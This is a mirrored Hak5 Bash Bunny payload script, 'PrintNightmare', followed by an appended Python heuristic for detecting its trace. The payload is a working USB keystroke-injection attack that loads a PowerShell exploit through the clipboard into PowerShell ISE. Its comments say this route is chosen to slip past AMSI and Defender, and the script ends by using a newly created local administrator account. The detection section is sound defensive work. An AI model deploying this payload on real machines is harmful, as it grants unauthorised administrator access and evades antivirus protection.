mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
* Housekeeping
  Moved some of the QUACK Powershell commands into the juicybit.txt file for speed and ease of use.
* Update README.md
* More improvement
  Added exit to the juicybits rather than using alt and /noprofile to the run as
* Update README.md

Co-authored-by: Marc <foxtrot@realloc.me>
79 lines
2.4 KiB
Plaintext
#Title: PrintNightmare
#Author: PanicAcid
#Version: 1.2
#
#Leverages the following PowerShell script https://github.com/calebstewart/CVE-2021-1675 to invoke the PrintNightmare vuln and create a local administrator account
#without bypassing Defender or execution policy. It ain't purdy but it works.
#
#PowerShell AMSI or whatever it's called kept picking it up and blocking it every time I tried to call the script externally;
#even bypassing execution policy seemed to work, but the output would always contain
#"This script contains malicious content and has been blocked by your antivirus software."
#
#However, if we run it via PowerShell ISE it works fine. So we're going to type out the whole thing! (Well, copy and paste it!)
#
#Huge thanks to Cribbit for the clipboard string - without it I would have been typing out the whole thing, which when I tried it took FOREVER.
#Additionally thanks to Korben and Foxtrot for putting up with my nonsense.
#
# NOTE - you may need to tweak the delays a bit. With version 1.0 I took for granted that it ran really fast on my machine, which caused
# some issues for other folks whereby it'd close the ISE window before finishing execution etc. So test and tweak the delays to your heart's
# content.
#
# Purple.............Loading
# Green .............Execute
# Off................Finished
#
#!/bin/bash

# OPTIONS - More options available in the PowerShell payload
OBFUSCATECMD="N" # Y=yes or N=no

#-----------------------------------
# Purple LED - initializing
LED SETUP

GET SWITCH_POSITION
DUCKY_LANG gb

# Attackmode HID
ATTACKMODE HID STORAGE

#-----------------------------------
# Green LED - executing credential_powershell
LED STAGE1
QUACK GUI r
QUACK DELAY 300
QUACK STRING powershell.exe
QUACK ENTER
QUACK DELAY 100
QUACK STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\juicybit.txt'))"
QUACK ENTER
QUACK DELAY 200
QUACK STRING exit
QUACK ENTER
QUACK DELAY 500
QUACK GUI r
QUACK DELAY 500
QUACK STRING powershell_ise.exe
QUACK ENTER
QUACK DELAY 4000
QUACK CONTROL d
QUACK CONTROL v
QUACK CONTROL d
QUACK ENTER
QUACK DELAY 3000
QUACK GUI r
QUACK DELAY 500
QUACK STRING cmd
QUACK DELAY 150
QUACK ENTER
QUACK DELAY 150
QUACK STRING "runas /noprofile /user:Hak5Rules cmd.exe && exit"
QUACK ENTER
QUACK DELAY 150
QUACK STRING Hak5Rules
QUACK DELAY 150
QUACK ENTER

#-----------------------------------
# Kill the lights - finished
LED FINISH
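As an added defender-side example that is not part of this payload or the hak5 repository: a Python heuristic that reconstructs the host-side trace this payload leaves (a powershell.exe Set-Clipboard read from a volume labelled BashBunny, a powershell_ise.exe launch shortly after, then a runas with /user:) from constructed telemetry. The event field names, timestamps and the 60-second correlation window are assumptions, not anything the payload or Windows defines.

```python
import re

# Stage fingerprints are lifted from the payload text above. The one-liner is typed into
# an interactive console, so on a real host it surfaces in PowerShell script block logging
# (Event 4104) rather than the process command line; the "text" field here stands for either.
CLIPBOARD_STAGE = re.compile(r"set-clipboard.*win32_volume.*bashbunny", re.IGNORECASE)
RUNAS_STAGE = re.compile(r"\brunas\b.*?/user:", re.IGNORECASE)
WINDOW_SECONDS = 60  # assumption: all three stages land well inside one minute

# Constructed sample telemetry, not real logs: ts in seconds, image name, command/script text.
SAMPLE_EVENTS = [
    {"ts": 100.0, "image": "explorer.exe", "text": "explorer.exe"},
    {"ts": 101.3, "image": "powershell.exe",
     "text": r"Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\switch1\juicybit.txt'))"},
    {"ts": 102.4, "image": "powershell_ise.exe", "text": "powershell_ise.exe"},
    {"ts": 110.1, "image": "cmd.exe", "text": "cmd"},
    {"ts": 110.4, "image": "runas.exe", "text": "runas /noprofile /user:Hak5Rules cmd.exe"},
    {"ts": 900.0, "image": "powershell_ise.exe", "text": "powershell_ise.exe"},  # lone ISE use
]

def classify(event):
    """Map one event to a payload stage name, or None if it is unrelated."""
    image = event["image"].lower()
    if image == "powershell.exe" and CLIPBOARD_STAGE.search(event["text"]):
        return "clipboard_load"
    if image == "powershell_ise.exe":
        return "ise_launch"
    if RUNAS_STAGE.search(event["text"]):
        return "runas"
    return None

def find_chains(events, window=WINDOW_SECONDS):
    """Group stage events into time windows and report (start_ts, stages) whenever two or
    more distinct stages occur within `window` seconds. A lone ISE launch is not reported."""
    tagged = sorted(((e["ts"], classify(e)) for e in events), key=lambda t: t[0])
    tagged = [t for t in tagged if t[1] is not None]
    chains, i = [], 0
    while i < len(tagged):
        start, stages, j = tagged[i][0], [], i
        while j < len(tagged) and tagged[j][0] - start <= window:
            if tagged[j][1] not in stages:
                stages.append(tagged[j][1])
            j += 1
        if len(stages) >= 2:
            chains.append((start, tuple(stages)))
        i = j
    return chains

if __name__ == "__main__":
    for start, stages in find_chains(SAMPLE_EVENTS):
        print(f"suspicious chain starting at t={start}: {' -> '.join(stages)}")
```

The lone powershell_ise.exe event at t=900 is deliberately left unflagged, since ISE on its own is ordinary administrator activity; the signal is the clipboard load from a BashBunny-labelled volume and the runas that bracket it.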